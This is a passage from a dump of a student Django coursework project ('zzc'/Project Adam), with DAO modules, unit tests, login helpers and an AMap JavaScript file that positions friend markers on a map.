"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import AddFriend\nfrom adam2014.DAO import AddFriendDAO\nfrom django.db import IntegrityError, transaction\nimport datetime\n\ndef newAddFriend(**addFriend):\n a = 'error'\n try:\n a = AddFriendDAO.insertAddFriend(**addFriend)\n except IntegrityError: #若usre1添加user2,user2还未确认,user1又发起了添加请求,则更新添加请求的时间\n now = datetime.datetime.now()\n a = AddFriendDAO.getAddFriendByuser_from_idAnduser_to_id(addFriend['user_from_id'],addFriend['user_to_id'])\n a.time = str(now)\n a.save()\n return a\n\ndef deleteAddFriend(id):\n try:\n AddFriendDAO.deleteAddFriend(id)\n except:\n return \"error\"\n return 'success'\n\ndef getAddFriendByuser_to_id(user_to_id):\n AddFriend = None\n try:\n AddFriend = AddFriendDAO.getAddFriendById(user_to_id)\n except:\n pass\n return AddFriend\n\ndef getAddFriendByuser_from_id(user_from_id):\n AddFriend = None\n try:\n AddFriend = AddFriendDAO.getAddFriendById(user_from_id)\n except:\n pass\n return AddFriend\n\n\n\n"
},
{
"alpha_fraction": 0.5813148617744446,
"alphanum_fraction": 0.5826989412307739,
"avg_line_length": 33.42856979370117,
"blob_id": "d8f15bb6dcea9fe49c4b8e8e6b044bb30faa65e6",
"content_id": "8dc1a33c7da5a67f5ec342a2a656ec84e874396f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1445,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 42,
"path": "/zzc/adam2014/JoinModels/FriendRelationListView.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\nimport datetime\nimport json\nclass FriendRelationListView(object):\n def __init__(self,frid,inBlackList,top,remark,time,userid,nickname,longitude,latitude,code,photo,phone):\n self.userid = userid\n self.frid = frid\n self.nickname = nickname\n self.code = code\n self.inBlackList = inBlackList\n self.top = top\n self.remark = remark\n self.longitude = longitude\n self.latitude = latitude\n self.photo = photo\n self.phone = phone\n self.time = time\n\n\n def printout(self):\n print(\"userid: \"+str(self.userid)+\" frid \"+str(self.frid)\n +\" nickname: \"+str(self.nickname)+\" code: \"+str(self.code)\n +\" inBlackList: \"+str(self.inBlackList)+' top: '+str(self.top)\n + 'remark: '+str(self.remark)+\" longitude:\"+str(self.longitude)+\" latitude\"+str(self.latitude))\\\n +' phone:'+str(self.phone)+' photo:'+str(self.photo)+' time:'+str(self.time)\n\n def object2dict(obj):\n d = {}\n #d['__class__'] = obj.__class__.__name__\n #d['__module__'] = obj.__module__\n d.update(obj.__dict__)\n return d\n\n\n# now = datetime.datetime.now()\n# print(now)\n# fr = FriendRelationListView('null','null','null','null',now,'null','null','null','null','null','null','null')\n# fr.printout()\n# print(fr)\n# #json = json.dumps(json.dumps({\"friend\": fr}))\n# json = fr.object2dict()\n# print(json)"
},
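Editor's note: the commented-out experiments at the bottom of this view class circle around JSON serialization. A tiny self-contained sketch of the pattern object2dict relies on (json.dumps over __dict__); the FriendView class here is a hypothetical stand-in, not part of the repo.

```python
import json


class FriendView(object):
    """Tiny stand-in for FriendRelationListView with two fields."""

    def __init__(self, userid, nickname):
        self.userid = userid
        self.nickname = nickname


# __dict__ holds exactly the instance attributes, so it serializes directly.
print(json.dumps({"friend": FriendView(1, "frank").__dict__}))
# {"friend": {"userid": 1, "nickname": "frank"}}
```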
{
"alpha_fraction": 0.5795240998268127,
"alphanum_fraction": 0.6268002390861511,
"avg_line_length": 47.378787994384766,
"blob_id": "b3ba172b413daa7197dbfc0684955fa0f6b951f7",
"content_id": "3444bc0956c9d7b6c1006608ed19b28abbb1afb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3194,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 66,
"path": "/zzc/adam2014/AllTest/DAOTest/testBottlePictureDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'flower_type'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.models import User\nfrom adam2014.DAO.BottlePictureDAO import *\nfrom adam2014.models import BottlePicture\nimport datetime\n\n\nclass BottlePictureTest(TestCase):\n def setUp(self):\n self.time = datetime.datetime.now()\n self.user1 = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"111111112\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n User.objects.create(**self.user1)\n User.objects.create(**self.user2)\n\n self.bottlePicture1 = {\"id\":1, \"usedTimes\":21, \"tookTime\":str(self.time), \"author\":\"jack\",\n \"content\":\"hello world!\", \"longitude\":12.33, \"latitude\":25.66, \"user_id\":1}\n self.bottlePicture2 = {\"id\":2, \"usedTimes\":13, \"tookTime\":str(self.time), \"author\":\"tom\",\n \"content\":\"welcome to python!\", \"longitude\":24.33, \"latitude\":16.87, \"user_id\":2}\n BottlePicture.objects.create(**self.bottlePicture1)\n BottlePicture.objects.create(**self.bottlePicture2)\n\n\n def test_insertBottlePicture(self):\n print(\"insertTest\")\n print(\"insertInform: id=3, usedTimes=24, tookTime=now, anthor=max, content=this is a insertcontent\")\n bottlePicture3 = {\"id\":3, \"usedTimes\":24, \"tookTime\":str(self.time), \"author\":\"max\",\n \"content\":\"this is a insert content!\", \"longitude\":13.21, \"latitude\":61.34, \"user_id\":1}\n before = len(BottlePicture.objects.all())\n insertBottlePicture(**bottlePicture3)\n after = len(BottlePicture.objects.all())\n print(\"insertResult\")\n print(BottlePicture.objects.all())\n self.assertEqual(after-before,1)\n\n def test_getBottlePictureById(self):\n print(\"getTest\")\n print(\"getInform: id=1, id=2\")\n print(\"getResult:\")\n print(getBottlePictureById(1))\n print(getBottlePictureById(2))\n self.assertEqual(getBottlePictureById(1).id,1)\n self.assertEqual(getBottlePictureById(2).id,2)\n\n def test_updateBottlePicture(self):\n print(\"updateTest\")\n print(\"updateInform: id=1, author=new_jack\")\n modified_bottlePicture = {\"id\":1, \"usedTimes\":22, \"tookTime\":str(self.time), \"author\":\"new_jack\",\n \"content\":\"new hello world!\", \"longitude\":66.66, \"latitude\":55.55, \"user_id\":1}\n updateBottlePicture(**modified_bottlePicture)\n print(\"updateResult:\")\n print(getBottlePictureById(1))\n self.assertEqual(getBottlePictureById(1).author, \"new_jack\")\n\n def test_deleteBottlePicture(self):\n print(\"deleteTest\")\n print(\"deleteInform: id=1, id=2\")\n deleteBottlePicture(1)\n deleteBottlePicture(2)\n self.assertEqual(len(BottlePicture.objects.filter(id=1)),0)\n self.assertEqual(len(BottlePicture.objects.filter(id=2)),0)\n\n"
},
{
"alpha_fraction": 0.6318715214729309,
"alphanum_fraction": 0.6324892044067383,
"avg_line_length": 20.586666107177734,
"blob_id": "f1838004387d0fcb30728c62c15b2f6f8ccdb423",
"content_id": "af19ccc026b13992d3ac5fd9bfd0eff7fe61ea38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1803,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 75,
"path": "/zzc/adam2014/auth/Httpsession.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'assiso'\n# -*- coding: utf-8 -*-\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\n####################################################\n#\n# 除了 UserVerify(request) 这个函数为了调用的方便返回值为True 或 False\n# 其余全部字符串,如 UserRegister(UserCode,Password) 返回值为\"Register Success\"\"Register False\"\n#\n# 切记,除了检测用户是否登陆、用户登出传入的参数为 request 外,其余全是 UserCode + Password\n#\n#\n####################################################\n\n\n\n\n\nfrom django.contrib.auth.models import User\nfrom django.contrib import auth\n\n\n# 用户注册\n# Joe\ndef UserRegister(usercode, password):\n try:\n user = User.objects.create_user(username=usercode, email='NULL', password=password)\n user.is_staff = True\n return \"Register Success\"\n except:\n return \"Register False\"\n\n#管理员注册\ndef AdminRegister(self):\n return \"Success\"\n\n\n#用户登陆\ndef UserLogin(request, usercode, password):\n user = auth.authenticate(username=usercode, password=password)\n if user is not None:\n auth.login(request, user)\n print usercode + \" Login Success\"\n return True\n return False\n\n\n#用户登出\ndef UserLogoff(request):\n auth.logout(request)\n return \"Logoff Success\"\n\n#检测用户是否登陆\ndef UserVerify(request):\n if request.user.is_authenticated():\n return True\n else:\n return False\n\n#用户更改密码\ndef UserChangePassWord(UserCode,Password):\n user = User.objects.get(username=UserCode)\n if user is None:\n return \"no such person\"\n else:\n user.set_password(Password)\n user.save()\n return \"Change Success\"\n\n\n#UserRegister(\"yyz\", \"\")\n"
},
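Editor's note: a minimal sketch of how a Django view might call the auth helpers above. The URL wiring and the POST parameter names (usercode/password) are assumptions; only the helper functions themselves come from the module.

```python
from django.http import HttpResponse

from adam2014.auth import Httpsession


def login_view(request):
    usercode = request.POST.get("usercode", "")
    password = request.POST.get("password", "")
    if Httpsession.UserLogin(request, usercode, password):
        return HttpResponse("Login Success")
    return HttpResponse("Login Failed", status=401)


def profile_view(request):
    # UserVerify wraps request.user.is_authenticated() for convenience.
    if not Httpsession.UserVerify(request):
        return HttpResponse("Please log in", status=401)
    return HttpResponse("Hello " + request.user.username)
```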
{
"alpha_fraction": 0.727011501789093,
"alphanum_fraction": 0.7385057210922241,
"avg_line_length": 24.814815521240234,
"blob_id": "1610dba76a5967c9a7b77117c44d471984e00605",
"content_id": "a93496045eab61395092cb7baa0b3bb8df9bf97a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 696,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 27,
"path": "/zzc/adam2014/DAO/LocationMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import LocationMessage\n# class LocationMessage(models.Model):\n# message = models.ForeignKey(Message,null=True)\n# content = models.TextField()\n\ndef insertLocationMessage(**locationMessage):\n l = LocationMessage.objects.create(**locationMessage)\n return l;\n\n\ndef deleteLocationMessage(id):\n LocationMessage.objects.get(id=id).delete()\n\ndef getLocationMessageById(id):\n return LocationMessage.objects.get(id=id)\n\ndef updateLocationMessage(**kw):\n LocationMessage.objects.filter(id=kw['id']).update(**kw)"
},
{
"alpha_fraction": 0.6729323267936707,
"alphanum_fraction": 0.6879699230194092,
"avg_line_length": 18.629629135131836,
"blob_id": "bd924a434cb9c9e3bdf189be1fd12949a1772879",
"content_id": "56002096851658b821b0f5ad544a5667919f7c4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 532,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 27,
"path": "/zzc/adam2014/DAO/GroupDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import Group\n\ndef insertGroup(**group):\n g = Group.objects.create(**group)\n return g;\n\ndef deleteGroup(id):\n Group.objects.get(id=id).delete()\n\ndef getGroupById(id):\n return Group.objects.get(id=id)\n\ndef getGroupByCode(code):\n return Group.objects.filter(code=code)\n\ndef updateGroup(**kw):\n Group.objects.filter(id=kw['id']).update(**kw)\n\n\n"
},
{
"alpha_fraction": 0.7245565056800842,
"alphanum_fraction": 0.7338935732841492,
"avg_line_length": 30.52941131591797,
"blob_id": "ea16a0a4d39809e2c85ab802b02d8c066a627c9b",
"content_id": "9a557c8d16ae64c92950d7442524b535a7cfcfb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1071,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 34,
"path": "/zzc/adam2014/DAO/FriendRelationDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import FriendRelation\n# class FriendRelation(models.Model):\n# user_from = models.ForeignKey(User)\n# user_to_id = models.IntegerField()\n# time = models.DateTimeField()\n# inBlackList = models.BooleanField(default=None)\n# remark = models.CharField(max_length=16)\n# top = models.BooleanField(default=None)\n\n\ndef insertFriendRelation(**friendRelation):\n f = FriendRelation.objects.create(**friendRelation)\n return f\n\ndef deleteFriendRelation(user_from_id,user_to_id):\n FriendRelation.objects.get(user_from_id=user_from_id,user_to_id=user_to_id).delete()\n\ndef getFriendRelationById(id):\n return FriendRelation.objects.get(id=id)\n\ndef getFriendRelationByCondition(user_from_id,user_to_id):\n return FriendRelation.objects.get(user_from_id=user_from_id,user_to_id=user_to_id)\n\ndef updateFriendRelation(**kw):\n FriendRelation.objects.filter(id=kw['id']).update(**kw)"
},
{
"alpha_fraction": 0.7759562730789185,
"alphanum_fraction": 0.7759562730789185,
"avg_line_length": 35.400001525878906,
"blob_id": "7e23092e045e0aea21b209bbbe879ba7cc5d177c",
"content_id": "15c538333fd24487e4da584a7320895ff37c398d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 183,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 5,
"path": "/README.md",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "# zzc\n\nThe project is also called Project Adam (as can be seem from the naming of one of the app folders). \n\nIt is courcework of Software Project Management and Quality Engineering.\n\n"
},
{
"alpha_fraction": 0.5817421674728394,
"alphanum_fraction": 0.6121254563331604,
"avg_line_length": 23,
"blob_id": "cd2324059c786346553a2e898caf4f06cd5c3c49",
"content_id": "0239ebaa37b84ae4d899f8a5bda993f1d8b76c9e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 8235,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 299,
"path": "/zzc/Distance/js/map.js",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "var mapObj = new AMap.Map('container');\nvar geolocation;\nvar currentX;\nvar currentY;\nvar friendsPosition_X = new Array();\nvar friendsPosition_Y = new Array();\nvar currentPositionMarker;\nvar friendsMarker = new Array();\n\n\nfunction initialize() {\n\n\t//从数据库获取上次朋友在线的位置;\n\tfriendsPosition_X.push(116.406326);\n\tfriendsPosition_Y.push(39.903942);\n\tfriendsPosition_X.push(115.406326);\n\tfriendsPosition_Y.push(32.903942);\n\n\n\tvar temp1 = new AMap.Marker({ // 创建自定义点标注 \n\t\tmap: mapObj,\n\t\tposition: new AMap.LngLat(116.406326, 39.903942),\n\t\toffset: new AMap.Pixel(0, 0),\n\t\ticon: \"img/top.png\"\n\t});\n\n\tvar temp2 = new AMap.Marker({ // 创建自定义点标注 \n\t\tmap: mapObj,\n\t\tposition: new AMap.LngLat(115.406326, 32.903942),\n\t\toffset: new AMap.Pixel(0, 0),\n\t\ticon: \"img/top.png\"\n\t});\n\n\tfriendsMarker.push(temp1);\n\tfriendsMarker.push(temp2);\n\n\n\n\t//地图添加浏览器定位功能\n\tmapObj.plugin('AMap.Geolocation', function() {\n\t\tgeolocation = new AMap.Geolocation({\n\t\t\tenableHighAccuracy: true, //是否使用高精度定位,默认:true\n\t\t\ttimeout: 10000, //超过10秒后停止定位,默认:无穷大\n\t\t\tmaximumAge: 0, //定位结果缓存0毫秒,默认:0\n\t\t\tconvert: true, //自动偏移坐标,偏移后的坐标为高德坐标,默认:true\n\t\t\tshowButton: true, //显示定位按钮,默认:true\n\t\t\tbuttonPosition: 'LB', //定位按钮停靠位置,默认:'LB',左下角\n\t\t\tbuttonOffset: new AMap.Pixel(10, 20), //定位按钮与设置的停靠位置的偏移量,默认:Pixel(10, 20)\n\t\t\tshowMarker: true, //定位成功后在定位到的位置显示点标记,默认:true\n\t\t\tshowCircle: false, //定位成功后用圆圈表示定位精度范围,默认:true\n\t\t\tpanToLocation: true, //定位成功后将定位到的位置作为地图中心点,默认:true\n\t\t\tzoomToAccuracy: true //定位成功后调整地图视野范围使定位位置及精度范围视野内可见,默认:false\n\t\t});\n\n\t\tmapObj.addControl(geolocation);\n\t\tAMap.event.addListener(geolocation, 'complete', onComplete); //返回定位信息\n\t\tAMap.event.addListener(geolocation, 'error', onError); //返回定位出错信息\n\t});\n\n\tAMap.event.addListener(mapObj, 'complete', mapOnComplete()); //返回定位信息\n\tAMap.event.addListener(mapObj, 'click', getLnglat);\n\n}\n\n\nfunction mapOnComplete() {\n\n\twatchPosition();\n\t//showMarkers();\n\n\n\n}\n\n//判读marker是否应该显示\nfunction showMarkers(e) {\n\n\n\t//\tfriendsMarker.setMap(null);\n\t//\tfriendsMarker.setMap(null);\n\t// mapObj.clearMap();\n\t//marker2.setMap(null);\n\t//显示当前位置\n\n\n\t// var marker = new AMap.Marker({ // 创建自定义点标注 \n\t//\t map:mapObj, \n\t//\t position: new AMap.LngLat(currentX, currentY), \n\t//\t offset: new AMap.Pixel(-10,-34), \n\t//\t icon: \"img/top.png\" \n\t//\t }); \n\n\t//首先计算中心点的经纬度\n\tvar mapCenter = mapObj.getCenter();\n\tvar x0 = mapCenter.getLng();\n\tvar y0 = mapCenter.getLat();\n\t//alert(latitude+\"and\"+longitude);\n\t//计算地图的高度和宽度;\n\tvar height = $(\"#container\").height();\n\tvar width = $(\"#container\").width();\n\t//拿到x1,y1的经纬度\n\tvar ll = mapObj.containTolnglat(new AMap.Pixel(0, 0));\n\tvar x1 = ll.getLng();\n\tvar y1 = ll.getLat();\n\t//拿到x2,y2的经纬度\n\tvar lll = mapObj.containTolnglat(new AMap.Pixel(width, height));\n\tvar x2 = lll.getLng();\n\tvar y2 = lll.getLat();\n\t// var x=e.lnglat.getLng();\n\t//var y=e.lnglat.getLat();\n\tfor (var i = 0; i < friendsMarker.length; i++) {\n\n\n\t\tvar x = friendsPosition_X[i];\n\t\tvar y = friendsPosition_Y[i];\n\n\t\tif (x > x1 && x < x2 && y > y2 && y < y1) {\n\t\t\tfriendsMarker[i].setPosition(new AMap.LngLat(x, y));\n\t\t\tfriendsMarker[i].setOffset(new AMap.Pixel(0, 0));\n\t\t\tfriendsMarker[i].setIcon(\"img/down.png\");\n\n\t\t} else {\n\t\t\tif (isTopOn2(x0, y0, x1, y1, x, y)) {\n\t\t\t\tif (isTopOn1(x0, y0, x2, y1, x, y)) {\n\t\t\t\t\t//在直线1和2的上方\n\n\t\t\t\t\tvar x_acture = (x - x0) * (y1 - y0) / (y - y0) + 
x0;\n\n\n\t\t\t\t\tfriendsMarker[i].setPosition(new AMap.LngLat(x_acture, y1));\n\t\t\t\t\tfriendsMarker[i].setOffset(new AMap.Pixel(0, 0));\n\t\t\t\t\tfriendsMarker[i].setIcon(\"img/top.png\");\n\n\n\n\t\t\t\t}\n\t\t\t\t//在直线的1的下方,在直线2的上方\n\t\t\t\telse {\n\t\t\t\t\tvar y_acture = (y - y0) * (x2 - x0) / (x - x0) + y0;\n\t\t\t\t\tfriendsMarker[i].setPosition(new AMap.LngLat(x2, y_acture));\n\t\t\t\t\tfriendsMarker[i].setOffset(new AMap.Pixel(-32, 0));\n\t\t\t\t\tfriendsMarker[i].setIcon(\"img/right.png\");\n\n\n\t\t\t\t}\n\n\t\t\t} else {\n\t\t\t\t//在直线1的上方,直线2的下方\n\t\t\t\tif (isTopOn1(x0, y0, x2, y1, x, y)) {\n\t\t\t\t\tvar y_acture = (y - y0) * (x1 - x0) / (x - x0) + y0;\n\t\t\t\t\tfriendsMarker[i].setPosition(new AMap.LngLat(x1, y_acture));\n\t\t\t\t\tfriendsMarker[i].setOffset(new AMap.Pixel(0, 0));\n\t\t\t\t\tfriendsMarker[i].setIcon(\"img/left.png\");\n\t\t\t\t}\n\t\t\t\t//在直线1的下方,直线2的下方\n\t\t\t\telse {\n\t\t\t\t\tvar x_acture = (x - x0) * (y2 - y0) / (y - y0) + x0;\n\t\t\t\t\tfriendsMarker[i].setPosition(new AMap.LngLat(x_acture, y2));\n\t\t\t\t\tfriendsMarker[i].setOffset(new AMap.Pixel(0, -32));\n\t\t\t\t\tfriendsMarker[i].setIcon(\"img/down.png\");\n\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\n\t}\n\n}\n\n\n\n//判断是否在直线的上方\nfunction isTopOn1(x0, y0, x2, y1, xi, yi) {\n\n\tvar tempY = xi * (y1 - y0) / (x2 - x0) + ((x2 - x0) * y0 - (y1 - y0) * x0) / (x2 - x0);\n\tif (tempY > yi) {\n\n\t\treturn false;\n\n\t} else {\n\n\t\treturn true;\n\t}\n}\n\n//判断是否在直线2的上方\n\n//判断是否在直线的上方\nfunction isTopOn2(x0, y0, x1, y1, xi, yi) {\n\n\tvar tempY = xi * (y1 - y0) / (x1 - x0) + ((x1 - x0) * y0 - (y1 - y0) * x0) / (x1 - x0);\n\n\tif (tempY > yi) {\n\n\t\treturn false;\n\t} else {\n\t\treturn true;\n\t}\n}\n\n\n/*\n *解析定位结果\n */\nfunction onComplete(data) {\n\n\n\t\tAMap.event.addListener(mapObj, 'zoomchange', showMarkers);\n\t\tAMap.event.addListener(mapObj, 'moveend', showMarkers);\n\t\t//mapObj.clearMap();\n\t\tcurrentX = data.position.getLng();\n\t\tcurrentY = data.position.getLat();\n\t\tif (currentPositionMarker != null) currentPositionMarker.setMap(null);\n\n\t\tvar markerContent = '<div> <img src=\"img/down.png\"> </img><img src=\"img/hehe.png\"></img></div>'\n\n\n\n\t\t// var markerContent = document.createElement(\"div\");\n\t\t//\t markerContent.className = \"markerContentStyle\";\n\t\t// \t//点标记中的图标\n\t\t//\tvar markerImg= document.createElement(\"img\");\n\t\t// markerImg.className=\"markerlnglat\";\n\t\t//\t markerImg.src=\"img/down.png\";\t\n\t\t//\t markerContent.appendChild(markerImg);\n\t\t//\t \n\t\t//\t \t//点标记中的图标\n\t\t//\tvar markerImg1= document.createElement(\"img\");\n\t\t// markerImg1.className=\"markerlnglat\";\n\t\t//\t markerImg1.src=\"img/down.png\";\t\n\t\t//\t markerContent.appendChild(markerImg1);\n\t\t//\t\n\n\t\tcurrentPositionMarker = new AMap.Marker({ //创建自定义点标注 \n\t\t\tmap: mapObj,\n\t\t\tposition: new AMap.LngLat(currentX, currentY),\n\t\t\toffset: new AMap.Pixel(-11, -32),\n\t\t\ticon: \"img/down.png\",\n\t\t\tcontent: markerContent //自定义点标记覆盖物内容\n\n\t\t});\n\n\t\t//\t\tvar str = '<p>定位成功</p>';\n\t\t//\t\tstr += '<p>经度:' + data.position.getLng() + '</p>';\n\t\t//\t\tstr += '<p>纬度:' + data.position.getLat() + '</p>'; \n\t\t//\t\tstr += '<p>精度:' + data.accuracy + ' 米</p>';\n\t\t//\t\tstr += '<p>是否经过偏移:' + (data.isConverted ? 
'是' : '否') + '</p>';\n\t\t//\t\tresult.innerHTML = str;\n\n\t}\n\t/*\n\t *监控当前位置并获取当前位置信息\n\t */\n\t/*\n\t *解析定位错误信息\n\t */\n\nfunction onError(data) {\n\tvar str = '<p>定位失败</p>';\n\tstr += '<p>错误信息:'\n\tswitch (data.info) {\n\t\tcase 'PERMISSION_DENIED':\n\t\t\tstr += '浏览器阻止了定位操作';\n\t\t\tbreak;\n\t\tcase 'POSITION_UNAVAILBLE':\n\t\t\tstr += '无法获得当前位置';\n\t\t\tbreak;\n\t\tcase 'TIMEOUT':\n\t\t\tstr += '定位超时';\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tstr += '未知错误';\n\t\t\tbreak;\n\t}\n\tstr += '</p>';\n\tresult.innerHTML = str;\n}\n\nfunction getCurrentPosition() {\n\tgeolocation.getCurrentPosition();\n}\n\nfunction watchPosition() {\n\tgeolocation.watchPosition();\n}\n\n//获取地图中心点的经纬度\nfunction getMapCenter() {\n\n\tvar mapCenter = mapObj.getCenter();\n}\n\nfunction getLnglat(e) {\n\tvar x = e.lnglat.getLng();\n\tvar y = e.lnglat.getLat();\n\tvar ll = mapObj.containTolnglat(new AMap.Pixel(x, y));\n\n}"
},
{
"alpha_fraction": 0.572945773601532,
"alphanum_fraction": 0.6226942539215088,
"avg_line_length": 34.039215087890625,
"blob_id": "66b51af472849aaa802f897319f513599fa13457",
"content_id": "b1ed8d728740880858346e51a48d0c74b2fa6898",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1789,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 51,
"path": "/zzc/adam2014/AllTest/DAOTest/testGroupDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.GroupDAO import *\nfrom adam2014.models import Group\n\nclass GroupDAOTest(TestCase):\n def setUp(self):\n self.group1 = {\"id\":1,\"name\":\"groupA\",\"ucount\":1,\"code\":\"535676\",\"creater_id\":1}\n self.group2 = {\"id\":2,\"name\":\"groupB\",\"ucount\":1,\"code\":\"155212\",\"creater_id\":2}\n\n Group.objects.create(**self.group1)\n Group.objects.create(**self.group2)\n\n def testInsertGroup(self):\n group3 = {\"name\":\"groupC\",\"ucount\":1,\"code\":\"12306\",\"creater_id\":1}\n before = len(Group.objects.all())\n print(\"testInsertGroup_before:\")\n print(Group.objects.all())\n insertGroup(**group3)\n print(\"testInsertGroup_after:\")\n print(Group.objects.all())\n self.assertEqual(getGroupByCode(\"12306\")[0].name,\"groupC\")\n after = len(Group.objects.all())\n self.assertEqual(after-before,1)\n\n def testGetGroupById(self):\n self.assertEqual(getGroupById(1).id,1)\n self.assertEqual(getGroupById(2).id,2)\n\n def testGetGroupByCode(self):\n groups = getGroupByCode(155212)\n print(\"testGetGroupByCode:155212\")\n for group in groups:\n print(group)\n\n def testUpdateGroup(self):\n group3 = {\"id\":1,\"name\":\"groupD\",\"ucount\":10,\"code\":\"1122\",\"creater_id\":1}\n updateGroup(**group3)\n print(\"testUpdateGroup:code:1122\")\n print(getGroupById(1))\n self.assertEqual(getGroupById(1).code,\"1122\")\n\n def testDeleteGroup(self):\n deleteGroup(1)\n deleteGroup(2)\n print(\"testDeleteAllGroup:\")\n print(Group.objects.all())\n self.assertEqual(len(Group.objects.filter(id=1)),0)\n self.assertEqual(len(Group.objects.filter(id=2)),0)\n\n\n"
},
{
"alpha_fraction": 0.6130836009979248,
"alphanum_fraction": 0.6427173614501953,
"avg_line_length": 39.647727966308594,
"blob_id": "af0528f37f30b066eb7b39e9c0c0bfe64b90cb32",
"content_id": "6ecd413754a9ad6698019344820fa0460a878cdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3829,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 88,
"path": "/zzc/adam2014/AllTest/DAOTest/testMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.MessageDAO import *\nfrom adam2014.models import Message\n\nclass MessageDAOTest(TestCase):\n def setUp(self):\n \t# Id\t主键\tint(11),自增,非空\t自增主键\n\t\t# type\t消息类型\tint(4),非空\t1文字,2语音,3图片,4位置。\n\t\t# content_id\t内容id\tInt(11),非空\t具体类型消息的id\n\t\t# time\t消息创建时间\tDatetime(),非空\t消息创建的具体时间\n\t\t# 我把setting的 USE_TZ = True 改成了 USE_TZ = False\n\t\t# 意思是不存储市区信息了,这样会消除一个插入time时候的warning\n\t\t# 并且将time这个域的default改成了datetime.datetime.now()\n self.textMessage = {\"id\":1,\"type\":1,\"content_id\":1} # 文字\n self.voiceMessage = {\"id\":2,\"type\":2,\"content_id\":2} # 语音\n self.pictureMessage = {\"id\":3,\"type\":3,\"content_id\":3} #图片\n self.locationMessage = {\"id\":4,\"type\":4,\"content_id\":4} #位置\n Message.objects.create(**self.textMessage)\n Message.objects.create(**self.voiceMessage)\n Message.objects.create(**self.pictureMessage)\n Message.objects.create(**self.locationMessage)\n\n # 加了之后的数量减去加了之前的数量等于1\n def test_insertMessage(self):\n \t# wenzi \n message5 = {\"type\":1,\"content_id\":5}\n before = len(Message.objects.all())\n insertMessage(**message5)\n after = len(Message.objects.all())\n self.assertEqual(after-before,1)\n # yuyin\n message6 = {\"type\":2,\"content_id\":6}\n before = len(Message.objects.all())\n insertMessage(**message6)\n after = len(Message.objects.all())\n self.assertEqual(after-before,1)\n # tupian\n message7 = {\"type\":3,\"content_id\":7}\n before = len(Message.objects.all())\n insertMessage(**message7)\n after = len(Message.objects.all())\n self.assertEqual(after-before,1)\n # weizhi\n message8 = {\"type\":4,\"content_id\":8}\n before = len(Message.objects.all())\n insertMessage(**message8)\n after = len(Message.objects.all())\n self.assertEqual(after-before,1)\n \n def test_getMessageById(self):\n self.assertEqual(getMessageById(1).id,1)\n self.assertEqual(getMessageById(2).id,2)\n 